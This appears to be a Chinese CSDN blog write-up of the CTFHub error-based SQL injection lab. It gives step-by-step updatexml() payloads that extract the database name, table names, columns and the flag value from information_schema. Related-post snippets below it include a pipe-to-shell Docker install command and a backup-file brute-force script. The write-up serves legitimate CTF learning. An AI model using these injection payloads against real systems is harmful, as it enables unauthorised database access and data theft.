CTFHub - 报错注入

已于 2023-11-03 17:46:34 修改
阅读量498 收藏 2
点赞数 6
分类专栏: CTFHub 文章标签: 网络安全 web安全 sql
于 2023-09-09 11:33:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Have_a_great_day/article/details/132768347
版权

目录

1. 报错注入

2. 注入流程

2.1 初始界面

2.2 判断注入类型

2.3 获取数据库 库名称

2.4 判断数据表 表名称

2.5 判断数据列 列名称

2.6 获取数据

         欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。

1. 报错注入

        在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。

        报错注入的原理,在错误信息中执行SQL 语句。触发报错的方式有很多,具体细节也不尽相同。
        报错注入手法多达20种,其中最常用的命令有:updatexml(好记)、 extractvalue、group by等。

2. 注入流程

2.1 初始界面

2.2 判断注入类型

        具体图和判断注入类型请查看CTFHub - 字符型注入文章。

        通道:CTFHub - 字符型注入_netsecurity_Zeus的博客-CSDN博客

        根据报错信息回显内容,可以看到报错信息内并未带有1 ,所以此处是 数字型注入。

        细说:第一个和第三个 ' 是数据库自带的符号,中间被扩住的是输入的内容,报错内容只是把单引号 ' 进行扩住,说明 ' 前的内容都没有问题,所以是数字型注入。

        闭合方式:在报错信息中,将输入的内容 1' 不看,剩下的 ' 为此数据库的闭合方式。

2.3 获取数据库 库名称

        concat(X,X,X) --- 链接合并字符串,存在三个参数。该命令不会对输入文件进行任何修改或排序,只会简单地将它们按照指定的顺序连接在一起。

        updatexml --- 报错注入里其中一种方法,存在三个参数。

        【~】 ---十六进制--> 【0x7e】,此处也可以用别的十六进制数,最好使用符号,避免和数据库名称搞混。

1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) #


~ ---十六进制---> 0x7e

2.4 判断数据表 表名称

        正常流程来获取表名称,因为报错信息只能一行一行进行回显,所以此处发现回显内容为:不止一行表。所以需要让报错信息一行一行进行回显。

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables),0x7e),1) #

上面的命令没有加限制条件,各位大佬看到这一步,可以尝试下面的命令

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1) #

        统计该数据库内共有多少张表。

        count(*) --- SQL查询语句中的聚合函数,用于计算指定表中的数量,不考虑具体的列值,只关注行数。

        可以看到该数据库中一共有161 张表,数量之多,难以想象。 
1 and updatexml(1,concat(0x7e,(select count(*) from information_schema.tables),0x7e),1) #

        此处,尝试了一下能不能一次性将表全部回显。结果是不能的,回显得长度有限。

        concat(0x7e, ,0x7e) --- 回显出的信息应该是【~内容~】。

        如下图,回显出的信息右部分并没有【~】符号。所以肯定是长度受限制了。那我们就需要一张一张进行回显。

1 and updatexml(1,concat(0x7e,(select group_coucat(table_name) from information_schema.tables),0x7e),1) #

        输出第一张表

        limit X,Y --- X:偏移量        Y:行数

        注:偏移量X是从0 开始计算的。

        例:limit 20,10 --- 获取第21 到30 的记录。

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 0,1),0x7e),1) #

        输出第二张表

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 1,1),0x7e),1) #

        输出flag 表,此处表太多了,我们已知flag 在倒数第二张,节省时间就直接获取了。

        如果在真实环境里,可能要一张一张获取了。目前小白我不知道有没有其他快捷办法。

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 159,1),0x7e),1) #

2.5 判断数据列 列名称

1 and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag'),0x7e),1) #

2.6 获取数据

1 and updatexml(1,concat(0x7e,(select flag from flag),0x7e),1) #

   

        获取该数据的长度。

        该数据一共有32 位。

        length() --- 常用于获取字符串的长度,用于验证字符串的有效性,计算字符个数以及进行字符串比较等操作。

1 and updatexml(1,concat(0x7e,(select length(flag) from flag),0x7e),1) #

        因为无法一次性将数据全部回显,所以需要截取位数,分步获取。

        将两次的数据拼凑在一起,就是整个flag 的内容。

        substr(string,start,length)
        string --- 提取字符串的源字符串。
        start --- 子字符串的起始位置,它可以是一个正整数或负整数。对于正整数,表示从左向右的偏移量,其中第一个字符的位置为1;对于负整数,表示从右向左的偏移量,其中最后一个字符的位置为-1。
        length --- 提取的子字符串的长度,是一个可选参数。如果指定了长度,将从起始位置开始提取指定长度的子字符串;如果未指定长度,则将提取从起始位置到字符串末尾的所有字符。 
1 and updatexml(1,concat(0x7e,(select substr(flag,1,16) from flag),0x7e),1) #
1 and updatexml(1,concat(0x7e,(select substr(flag,17,32) from flag),0x7e),1) #

懒羊羊安全
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境 0x00 前言 CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。 0x01 搭建环境 使用CTFhub中的环境的前提条件需要在本地搭建docker的环境。 Ubuntu安装Docker如下: 支持版本 Ubuntu Precise 12.04 (LTS) Ubuntu Trusty 14.04 (LTS) Ubuntu Wily 15.10 以上版本之后的所有版本 内核高于3.10 1.获取安装最新版本的Docker wget -qO- https://get.docker.com/ | sh 或者 apt-get update && apt-get install docker.io 2.启动Docker服务 service docker start 3.安装co
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
CtfHub-wp(web
最新发布
01-23
ctfhub平台web篇wp
CTFHub_技能树_WebSQL注入——报错注入详细原理讲解(含三种解法原理讲解)
Ho1aAs‘s Blog
12-20 1006
文章目录一、报错注入原理报错注入常用函数floor()extractvalue()、updatexml()原理二、注入过程Ⅰ、使用floor()1.查询表名2.查询列名3.查值Ⅱ、使用extractvalue()1.查询表名2.查询列名3.查值Ⅲ、使用updatexml()1.查询表名2.查询列名3.查值 一、报错注入原理 报错注入,通过运行SQL查询语句,回显查询结果。由于某些函数的神奇操作会使得传入参数先运行,而被报错抛出,能够直接查看参数的运行情况,因而实现查询。 报错注入常用函数 《代码审计:企业
CTFHUB-SQL注入-报错注入
m0_64180167的博客
11-29 802
报错注入是在网站提供查询时进行SQL注入在用户输入了错误的信息时 网站进行报错处理但是提交的不进行审查 就会让代码随着报错指令进入目录。
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2462
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此题 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
CTFHUB报错注入的几种不同方式
PigletTT的博客
07-04 1081
CFTHUB 报错注入 一、报错注入原理 1.xml函数updatexml() UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; 该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换,不符合语法格
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 2697
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
CTFHUB-报错注入
Web学习之路
03-21 218
理解
CTFHub报错注入
sGanYu
07-24 1825
手动注入 发现无论输入什么,都只会回显成功或者错误 可以根据updatexml的报错注入来获取信息 updatexml (string, xpath_string, string) 第一个参数:可以输入1,为XML文档对象的名称 第二个参数:xpath_string ,提取多个子节点的文本 第三个参数:可以输入1,替换查找的符合条件的参数 0x7e是一个代表~的十六进制,可以用’%’,或者’~’来代替 查询出两个表,一个为news一个为flag,这里也可以把'sqli'换成database
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTFtools-SNOW.zip
11-03
Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息“ -p "文件名
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF脚本-caser凯撒解密
05-26
用于凯撒解密,通过python3 caser_凯撒密码.py,在输入框中输入需要解密的caser密文,脚本即可自动进行凯撒解密
CTFhub SQL注入
weixin_62420492的博客
01-28 2960
整数型注入 基本步骤 检查是否存在注入 and 1=1 返回正确 and 1=2 返回错误 猜字段数 order by x 得出字段数 爆数据库名 ? id=1 and 1=2 union select 1,database() 爆表名 ? id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.rables where table _schema='sqli' 得到表名n
SQL学习(CTFhub)整数型注入,字符型注入,报错注入 -----手工注入+ sqlmap注入
qq_73861475的博客
11-13 502
1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段。id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump。id=1 -D (数据库名) -T (输入需要查询的表名) --columns。-1' union select 1,database() #(这里的-1和整数型注入的情况一样)那就输入1' ,发现报错没有回显,接着输入1' and 1=1。
CTFHub 报错注入
weixin_44732566的博客
02-20 4180
CTFHub 报错注入 当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误。 ...
CTFHub 技能树之报错注入
qq_47271638的博客
05-28 479
首先测试注入点 and1=1 ;'and 1=1 ;'and 1=2, ?id=2-1;一起加上测试 发现没有回显初步判断可能是报错注入或者是时间盲注或者布尔盲注; 假设为报错注入. 查询数据库 构造注入语句 : ?id=1 and updatexml(1,concat(’~’,(select database())),1)– 得到数据库名:sqli 查询数据表 构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(table_name
ctfsql注入——报错注入
wlllllianqing的博客
09-14 962
报错注入 报错注入主要利用执行的报错返回的信息来进行注入从而获得需要的信息。 报错注入有许多的函数可以使用 例如: floor(rand()*2); updatexml函数:or updatexml(1,concat(0x7e,(version())),0); updatexml第二个参数需要的是Xpath格式的字符串。输入不符合,因此报错。 *updatexml的最大长度是32位。 and extractvalue(1,concat(0x7e,(select database()))) and exp(
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py http://challenge-e87e0210287ba7b3.sandbox.ctfhub.com:10800/.git/"来使用GitHack工具进行扫描和利用。同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,这些工具只是为了帮助你快速发现ctfhub-git的泄露,真正的挖掘过程并不会像这样直接告诉你哪里有泄露,需要自己去尝试和探索。此外,Git这一工具的使用也相当复杂,需要深入学习和实践才能熟练掌握。所以,在学习的道路上还有很长的路要走,希望你能坚持学习,共同进步!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值